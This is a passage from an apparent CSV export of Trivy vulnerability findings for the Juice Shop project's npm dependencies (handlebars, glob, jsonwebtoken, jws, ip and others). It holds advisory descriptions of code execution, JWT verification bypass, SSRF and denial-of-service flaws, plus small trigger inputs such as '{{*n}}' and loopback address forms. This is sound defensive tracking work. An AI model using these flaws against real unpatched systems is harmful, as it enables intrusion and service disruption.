using libraries such as jwks-rsa as the **secret**. You can fix this by specifying **algorithms** in the express-jwt configuration. See linked GHSA for example. This is also fixed in version 6.0.0. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/express-jwt/package.json,,True,,False,False,,False,,4dcd0b3c67f7504e208fa2d06bcb0f2135df3d457030cb041e4b0b4323d3c292,89,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.041571+00:00,,,,,0,[],6.0.0,,S1,False,,,,,,,,False,https://github.com/auth0/express-jwt/commit/7ecab5f8f0cab5297c2b863596566eb0c019cdef NEWLINE https://github.com/auth0/express-jwt/security/advisories/GHSA-6g6m-m6h5-w9gf NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2020-15084,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2020-15084 Express-JWT 0.1.3,False,False,,2026-05-12 17:37:05.041525+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2020-15084,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],glob,10.4.5,2026-05-12 17:37:05.049693+00:00,CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H,7.5,,,78,2026-05-12,,,"glob: glob: Command Injection Vulnerability via Malicious Filenames NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 11.1.0, 10.5.0 NEWLINE NEWLINE Glob matches files using patterns the shell uses. Starting in version 10.2.0 and prior to versions 10.5.0 and 11.1.0, the glob CLI contains a command injection vulnerability in its -c/--cmd option that allows arbitrary command execution when processing files with malicious names. When glob -c are used, matched filenames are passed to a shell with shell: true, enabling shell metacharacters in filenames to trigger command injection and achieve arbitrary code execution under the user or CI account privileges. This issue has been patched in versions 10.5.0 and 11.1.0. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/glob/package.json,,True,,False,False,,False,,e3ba4d9f77a254be6d1a31ae5cc550e5a04a52a5ba64aded3a7d3a3210764ace,91,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.049757+00:00,,,,,0,[],"11.1.0, 10.5.0",,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2025-64756 NEWLINE https://github.com/isaacs/node-glob NEWLINE https://github.com/isaacs/node-glob/commit/1e4e297342a09f2aa0ced87fcd4a70ddc325d75f NEWLINE https://github.com/isaacs/node-glob/commit/47473c046b91c67269df7a66eab782a6c2716146 NEWLINE https://github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2025-64756 NEWLINE https://www.cve.org/CVERecord?id=CVE-2025-64756,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2025-64756 Glob 10.4.5,False,False,,2026-05-12 17:37:05.049701+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2025-64756,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],handlebars,4.7.7,2026-05-12 17:37:05.060411+00:00,CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H,8.1,,,94,2026-05-12,,,"handlebars: Handlebars: Arbitrary code execution via @partial-block overwrite NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 4.7.9 NEWLINE NEWLINE Handlebars provides the power necessary to let users build semantic templates. In versions 4.0.0 through 4.7.8, the `@partial-block` special variable is stored in the template data context and is reachable and mutable from within a template via helpers that accept arbitrary objects. When a helper overwrites `@partial-block` with a crafted Handlebars AST, a subsequent invocation of `{{> @partial-block}}` compiles and executes that AST, enabling arbitrary JavaScript execution on the server. Version 4.7.9 fixes the issue. Some workarounds are available. First, use the runtime-only build (`require('handlebars/runtime')`). The `compile()` method is absent, eliminating the vulnerable fallback path. Second, audit registered helpers for any that write arbitrary values to context objects. Helpers should treat context data as read-only. Third, avoid registering helpers from third-party packages (such as `handlebars-helpers`) in contexts where templates or context data can be influenced by untrusted input. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/handlebars/package.json,,True,,False,False,,False,,637e1eb8a1f50b9c2c27c1de14f835fc63c2ab3450e9052282c0f7df8664166b,94,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.060471+00:00,,,,,0,[],4.7.9,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-33938 NEWLINE https://github.com/handlebars-lang/handlebars.js NEWLINE https://github.com/handlebars-lang/handlebars.js/commit/68d8df5a88e0a26fe9e6084c5c6aaebe67b07da2 NEWLINE https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.9 NEWLINE https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-3mfm-83xf-c92r NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-33938 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-33938,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-33938 Handlebars 4.7.7,False,False,,2026-05-12 17:37:05.060420+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-33938,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],handlebars,4.7.7,2026-05-12 17:37:05.064625+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,754,2026-05-12,,,"handlebars.js: Handlebars.js: Denial of Service via malformed decorator syntax in template compilation NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 4.7.9 NEWLINE NEWLINE Handlebars provides the power necessary to let users build semantic templates. In versions 4.0.0 through 4.7.8, when a Handlebars template contains decorator syntax referencing an unregistered decorator (e.g. `{{*n}}`), the compiled template calls `lookupProperty(decorators, ""n"")`, which returns `undefined`. The runtime then immediately invokes the result as a function, causing an unhandled `TypeError: ... is not a function` that crashes the Node.js process. Any application that compiles user-supplied templates without wrapping the call in a `try/catch` is vulnerable to a single-request Denial of Service. Version 4.7.9 fixes the issue. Some workarounds are available. Wrap compilation and rendering in `try/catch`. Validate template input before passing it to `compile()`; reject templates containing decorator syntax (`{{*...}}`) if decorators are not used in your application. Use the pre-compilation workflow; compile templates at build time and serve only pre-compiled templates; do not call `compile()` at request time. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/handlebars/package.json,,True,,False,False,,False,,43956e7e7974022d3129f6581c08e32a419f85dc924d834f3f34c481d1ac539f,95,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.064680+00:00,,,,,0,[],4.7.9,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-33939 NEWLINE https://github.com/handlebars-lang/handlebars.js NEWLINE https://github.com/handlebars-lang/handlebars.js/commit/68d8df5a88e0a26fe9e6084c5c6aaebe67b07da2 NEWLINE https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.9 NEWLINE https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-9cx6-37pm-9jff NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-33939 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-33939,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-33939 Handlebars 4.7.7,False,False,,2026-05-12 17:37:05.064634+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-33939,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],handlebars,4.7.7,2026-05-12 17:37:05.068123+00:00,CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H,8.1,,,94,2026-05-12,,,"handlebars.js: Handlebars.js: Arbitrary code execution via crafted template context NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 4.7.9 NEWLINE NEWLINE Handlebars provides the power necessary to let users build semantic templates. In versions 4.0.0 through 4.7.8, a crafted object placed in the template context can bypass all conditional guards in `resolvePartial()` and cause `invokePartial()` to return `undefined`. The Handlebars runtime then treats the unresolved partial as a source that needs to be compiled, passing the crafted object to `env.compile()`. Because the object is a valid Handlebars AST containing injected code, the generated JavaScript executes arbitrary commands on the server. The attack requires the adversary to control a value that can be returned by a dynamic partial lookup. Version 4.7.9 fixes the issue. Some workarounds are available. First, use the runtime-only build (`require('handlebars/runtime')`). Without `compile()`, the fallback compilation path in `invokePartial` is unreachable. Second, sanitize context data before rendering: Ensure no value in the context is a non-primitive object that could be passed to a dynamic partial. Third, avoid dynamic partial lookups (`{{> (lookup ...)}}`) when context data is user-controlled. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/handlebars/package.json,,True,,False,False,,False,,48dea58cf5a044f9c68cb3535c2475fdb13313f8efb20a86097d54a01117071b,96,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.068209+00:00,,,,,0,[],4.7.9,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-33940 NEWLINE https://github.com/handlebars-lang/handlebars.js NEWLINE https://github.com/handlebars-lang/handlebars.js/commit/68d8df5a88e0a26fe9e6084c5c6aaebe67b07da2 NEWLINE https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.9 NEWLINE https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-xhpv-hc6g-r9c6 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-33940 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-33940,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-33940 Handlebars 4.7.7,False,False,,2026-05-12 17:37:05.068133+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-33940,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],handlebars,4.7.7,2026-05-12 17:37:05.072320+00:00,CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H,8.3,,,79,2026-05-12,,,"handlebars.js: Handlebars: Arbitrary code execution via CLI precompiler input sanitization flaw NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 4.7.9 NEWLINE NEWLINE Handlebars provides the power necessary to let users build semantic templates. In versions 4.0.0 through 4.7.8, the Handlebars CLI precompiler (`bin/handlebars` / `lib/precompiler.js`) concatenates user-controlled strings — template file names and several CLI options — directly into the JavaScript it emits, without any escaping or sanitization. An attacker who can influence template filenames or CLI arguments can inject arbitrary JavaScript that executes when the generated bundle is loaded in Node.js or a browser. Version 4.7.9 fixes the issue. Some workarounds are available. First, validate all CLI inputs before invoking the precompiler. Reject filenames and option values that contain characters with JavaScript string-escaping significance (`""`, `'`, `;`, etc.). Second, use a fixed, trusted namespace string passed via a configuration file rather than command-line arguments in automated pipelines. Third, run the precompiler in a sandboxed environment (container with no write access to sensitive paths) to limit the impact of successful exploitation. Fourth, audit template filenames in any repository or package that is consumed by an automated build pipeline. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/handlebars/package.json,,True,,False,False,,False,,1b0455809d4368b73089dedc306358047751a61f952332dcc134447320cc0e0d,97,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.072377+00:00,,,,,0,[],4.7.9,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-33941 NEWLINE https://github.com/handlebars-lang/handlebars.js NEWLINE https://github.com/handlebars-lang/handlebars.js/commit/68d8df5a88e0a26fe9e6084c5c6aaebe67b07da2 NEWLINE https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.9 NEWLINE https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-xjpj-3mr7-gcpf NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-33941 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-33941,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-33941 Handlebars 4.7.7,False,False,,2026-05-12 17:37:05.072329+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-33941,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],http-cache-semantics,3.8.1,2026-05-12 17:37:05.088529+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,1333,2026-05-12,,,"http-cache-semantics: Regular Expression Denial of Service (ReDoS) vulnerability NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 4.1.1 NEWLINE NEWLINE This affects versions of the package http-cache-semantics before 4.1.1. The issue can be exploited via malicious request header values sent to a server, when that server reads the cache policy from the request using this library. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/http-cache-semantics/package.json,,True,,False,False,,False,,571fd4fc46d4f69792e2fc2b1ef536fa0c2b102b3c55018951bb7e234935d0c7,101,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.088588+00:00,,,,,0,[],4.1.1,,S1,False,,,,,,,,False,https://access.redhat.com/errata/RHSA-2023:2655 NEWLINE https://access.redhat.com/security/cve/CVE-2022-25881 NEWLINE https://bugzilla.redhat.com/2165824 NEWLINE https://bugzilla.redhat.com/2168631 NEWLINE https://bugzilla.redhat.com/2171935 NEWLINE https://bugzilla.redhat.com/2172190 NEWLINE https://bugzilla.redhat.com/2172204 NEWLINE https://bugzilla.redhat.com/2172217 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2165824 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2168631 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2171935 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2172190 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2172204 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2172217 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2178076 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25881 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4904 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23918 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23920 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23936 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24807 NEWLINE https://errata.almalinux.org/9/ALSA-2023-2655.html NEWLINE https://errata.rockylinux.org/RLSA-2023:2655 NEWLINE https://github.com/kornelski/http-cache-semantics NEWLINE https://github.com/kornelski/http-cache-semantics/blob/master/index.js%23L83 NEWLINE https://github.com/kornelski/http-cache-semantics/commit/560b2d8ef452bbba20ffed69dc155d63ac757b74 NEWLINE https://linux.oracle.com/cve/CVE-2022-25881.html NEWLINE https://linux.oracle.com/errata/ELSA-2023-2655.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2022-25881 NEWLINE https://security.netapp.com/advisory/ntap-20230622-0008 NEWLINE https://security.netapp.com/advisory/ntap-20230622-0008/ NEWLINE https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-3253332 NEWLINE https://security.snyk.io/vuln/SNYK-JS-HTTPCACHESEMANTICS-3248783 NEWLINE https://www.cve.org/CVERecord?id=CVE-2022-25881,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2022-25881 HTTP-Cache-Semantics 3.8.1,False,False,,2026-05-12 17:37:05.088538+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2022-25881,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],ip,2.0.1,2026-05-12 17:37:05.092719+00:00,CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H,8.1,,,918,2026-05-12,,,"node-ip: Incomplete fix for CVE-2023-42282 NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** NEWLINE NEWLINE The ip package through 2.0.1 for Node.js might allow SSRF because some IP addresses (such as 127.1, 01200034567, 012.1.2.3, 000:0:0000::01, and ::fFFf:127.0.0.1) are improperly categorized as globally routable via isPublic. NOTE: this issue exists because of an incomplete fix for CVE-2023-42282. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/ip/package.json,,False,,False,False,,False,,095bbcab1d8ca926b2c9546a5fb3445d4381be03eb8f1f07dd0c96ccab7a9357,102,affected,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.092785+00:00,,,,,0,[],,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2024-29415 NEWLINE https://cosmosofcyberspace.github.io/npm_ip_cve/npm_ip_cve.html NEWLINE https://github.com/indutny/node-ip NEWLINE https://github.com/indutny/node-ip/issues/150 NEWLINE https://github.com/indutny/node-ip/pull/143 NEWLINE https://github.com/indutny/node-ip/pull/144 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2024-29415 NEWLINE https://security.netapp.com/advisory/ntap-20250117-0010 NEWLINE https://security.netapp.com/advisory/ntap-20250117-0010/ NEWLINE https://www.cve.org/CVERecord?id=CVE-2024-29415,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2024-29415 Ip 2.0.1,False,False,,2026-05-12 17:37:05.092728+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2024-29415,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],jsonwebtoken,0.1.0,2026-05-12 17:37:05.108986+00:00,CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N,8.1,,,327,2026-05-12,,,"jsonwebtoken: Unrestricted key type could lead to legacy keys usagen NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 9.0.0 NEWLINE NEWLINE Versions `<=8.5.1` of `jsonwebtoken` library could be misconfigured so that legacy, insecure key types are used for signature verification. For example, DSA keys could be used with the RS256 algorithm. You are affected if you are using an algorithm and a key type other than a combination listed in the GitHub Security Advisory as unaffected. This issue has been fixed, please update to version 9.0.0. This version validates for asymmetric key type and algorithm combinations. Please refer to the above mentioned algorithm / key type combinations for the valid secure configuration. After updating to version 9.0.0, if you still intend to continue with signing or verifying tokens using invalid key type/algorithm value combinations, you’ll need to set the `allowInvalidAsymmetricKeyTypes` option to `true` in the `sign()` and/or `verify()` functions. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/express-jwt/node_modules/jsonwebtoken/package.json,,True,,False,False,,False,,6f3dfc185629e8776a771b457a4512c2368ac2ffd1ac30190e791b23ed9a0968,106,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.109074+00:00,,,,,0,[],9.0.0,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2022-23539 NEWLINE https://github.com/auth0/node-jsonwebtoken NEWLINE https://github.com/auth0/node-jsonwebtoken/commit/e1fa9dcc12054a8681db4e6373da1b30cf7016e3 NEWLINE https://github.com/auth0/node-jsonwebtoken/security/advisories/GHSA-8cf7-32gw-wr33 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2022-23539 NEWLINE https://security.netapp.com/advisory/ntap-20240621-0007 NEWLINE https://security.netapp.com/advisory/ntap-20240621-0007/ NEWLINE https://www.cve.org/CVERecord?id=CVE-2022-23539,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2022-23539 Jsonwebtoken 0.1.0,False,False,,2026-05-12 17:37:05.108999+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2022-23539,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],jsonwebtoken,0.1.0,2026-05-12 17:37:05.113469+00:00,,,,,0,2026-05-12,,,"Verification Bypass NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** >=4.2.2 NEWLINE NEWLINE It is possible for an attacker to bypass verification when ""a token digitally signed with an asymetric key (RS/ES family) of algorithms but instead the attacker send a token digitally signed with a symmetric algorithm (HS* family)"" [1] NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/express-jwt/node_modules/jsonwebtoken/package.json,,True,,False,False,,False,,8c52b3d98311b402fcdd15a9b1d27153f2446f6a7a59b2c0fd542611007172c5,107,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.113524+00:00,,,,,0,[],>=4.2.2,,S1,False,,,,,,,,False,https://auth0.com/blog/2015/03/31/critical-vulnerabilities-in-json-web-token-libraries/ NEWLINE https://github.com/auth0/node-jsonwebtoken/commit/1bb584bc382295eeb7ee8c4452a673a77a68b687 NEWLINE https://www.timmclean.net/2015/02/25/jwt-alg-none.html,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,NSWG-ECO-17 Jsonwebtoken 0.1.0,False,False,,2026-05-12 17:37:05.113478+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,NSWG-ECO-17,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],jsonwebtoken,0.4.0,2026-05-12 17:37:05.130088+00:00,CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N,8.1,,,327,2026-05-12,,,"jsonwebtoken: Unrestricted key type could lead to legacy keys usagen NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 9.0.0 NEWLINE NEWLINE Versions `<=8.5.1` of `jsonwebtoken` library could be misconfigured so that legacy, insecure key types are used for signature verification. For example, DSA keys could be used with the RS256 algorithm. You are affected if you are using an algorithm and a key type other than a combination listed in the GitHub Security Advisory as unaffected. This issue has been fixed, please update to version 9.0.0. This version validates for asymmetric key type and algorithm combinations. Please refer to the above mentioned algorithm / key type combinations for the valid secure configuration. After updating to version 9.0.0, if you still intend to continue with signing or verifying tokens using invalid key type/algorithm value combinations, you’ll need to set the `allowInvalidAsymmetricKeyTypes` option to `true` in the `sign()` and/or `verify()` functions. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/jsonwebtoken/package.json,,True,,False,False,,False,,ca3b8b343542a955f549294d867be0a27219b1a0857a8fc24fb609e981327d70,111,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.130144+00:00,,,,,0,[],9.0.0,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2022-23539 NEWLINE https://github.com/auth0/node-jsonwebtoken NEWLINE https://github.com/auth0/node-jsonwebtoken/commit/e1fa9dcc12054a8681db4e6373da1b30cf7016e3 NEWLINE https://github.com/auth0/node-jsonwebtoken/security/advisories/GHSA-8cf7-32gw-wr33 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2022-23539 NEWLINE https://security.netapp.com/advisory/ntap-20240621-0007 NEWLINE https://security.netapp.com/advisory/ntap-20240621-0007/ NEWLINE https://www.cve.org/CVERecord?id=CVE-2022-23539,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2022-23539 Jsonwebtoken 0.4.0,False,False,,2026-05-12 17:37:05.130096+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2022-23539,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],jsonwebtoken,0.4.0,2026-05-12 17:37:05.133841+00:00,,,,,0,2026-05-12,,,"Verification Bypass NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** >=4.2.2 NEWLINE NEWLINE It is possible for an attacker to bypass verification when ""a token digitally signed with an asymetric key (RS/ES family) of algorithms but instead the attacker send a token digitally signed with a symmetric algorithm (HS* family)"" [1] NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/jsonwebtoken/package.json,,True,,False,False,,False,,0142e140f79a7a7ac358e4012958cf9a35cf175d14eed3fcb56c91f6a1a62771,112,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.133894+00:00,,,,,0,[],>=4.2.2,,S1,False,,,,,,,,False,https://auth0.com/blog/2015/03/31/critical-vulnerabilities-in-json-web-token-libraries/ NEWLINE https://github.com/auth0/node-jsonwebtoken/commit/1bb584bc382295eeb7ee8c4452a673a77a68b687 NEWLINE https://www.timmclean.net/2015/02/25/jwt-alg-none.html,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,NSWG-ECO-17 Jsonwebtoken 0.4.0,False,False,,2026-05-12 17:37:05.133849+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,NSWG-ECO-17,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],jws,0.2.6,2026-05-12 17:37:05.145735+00:00,CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N,8.7,,,0,2026-05-12,,,"Forgeable Public/Private Tokens NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** >=3.0.0 NEWLINE NEWLINE Since ""algorithm"" isn't enforced in `jws.verify()`, a malicious user could choose what algorithm is sent to the server. If the server is expecting RSA but is sent HMAC-SHA with RSA's public key, the server will think the public key is actually an HMAC private key. This could be used to forge any data an attacker wants. NEWLINE NEWLINE In addition, there is the `none` algorithm to be concerned about. In versions prior to 3.0.0, verification of the token could be bypassed when the `alg` field is set to `none`. NEWLINE NEWLINE *Edit ( 7/29/16 ): A previous version of this advisory incorrectly stated that the vulnerability was patched in version 2.0.0 instead of 3.0.0. The advisory has been updated to reflect this new information. Thanks to Fabien Catteau for reporting the error.* NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/jws/package.json,,True,,False,False,,False,,fc82af3efd8f08845b524488304dda7da7859112ccd3757af3ffa43814fda976,115,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.145848+00:00,,,,,0,[],>=3.0.0,,S1,False,,,,,,,,False,https://auth0.com/blog/2015/03/31/critical-vulnerabilities-in-json-web-token-libraries NEWLINE https://auth0.com/blog/2015/03/31/critical-vulnerabilities-in-json-web-token-libraries/ NEWLINE https://github.com/brianloveswords/node-jws NEWLINE https://github.com/brianloveswords/node-jws/commit/585d0e1e97b6747c10cf5b7689ccc5618a89b299#diff-4ac32a78649ca5bdd8e0ba38b7006a1e NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2016-1000223 NEWLINE https://snyk.io/vuln/npm:jws:20160726 NEWLINE https://www.npmjs.com/advisories/88,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2016-1000223 JWS 0.2.6,False,False,,2026-05-12 17:37:05.145750+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2016-1000223,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],jws,0.2.6,2026-05-12 17:37:05.149906+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N,7.5,,,347,2026-05-12,,,"node-jws: auth0/node-jws: Improper signature verification in HS256 algorithm NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 3.2.3, 4.0.1 NEWLINE NEWLINE auth0/node-jws is a JSON Web Signature implementation for Node.js. In versions 3.2.2 and earlier and version 4.0.0, auth0/node-jws has an improper signature verification vulnerability when using the HS256 algorithm under specific conditions. Applications are affected when they use the jws.createVerify() function for HMAC algorithms and use user-provided data from the JSON Web Signature protected header or payload in HMAC secret lookup routines, which can allow attackers to bypass signature verification. This issue has been patched in versions 3.2.3 and 4.0.1. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/jws/package.json,,True,,False,False,,False,,390c1f141543818f055de41579ca3e9ca67f46d6758971397ca47800e56f2997,116,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.149963+00:00,,,,,0,[],"3.2.3, 4.0.1",,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2025-65945 NEWLINE https://github.com/auth0/node-jws NEWLINE https://github.com/auth0/node-jws/commit/34c45b2c04434f925b638de6a061de9339c0ea2e NEWLINE https://github.com/auth0/node-jws/commit/4f6e73f24df42f07d632dec6431ade8eda8d11a6 NEWLINE https://github.com/auth0/node-jws/releases/tag/v3.2.3 NEWLINE https://github.com/auth0/node-jws/releases/tag/v4.0.1 NEWLINE https://github.com/auth0/node-jws/security/advisories/GHSA-869p-cjfg-cm3x NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2025-65945 NEWLINE https://www.cve.org/CVERecord?id=CVE-2025-65945,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2025-65945 JWS 0.2.6,False,False,,2026-05-12 17:37:05.149915+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice 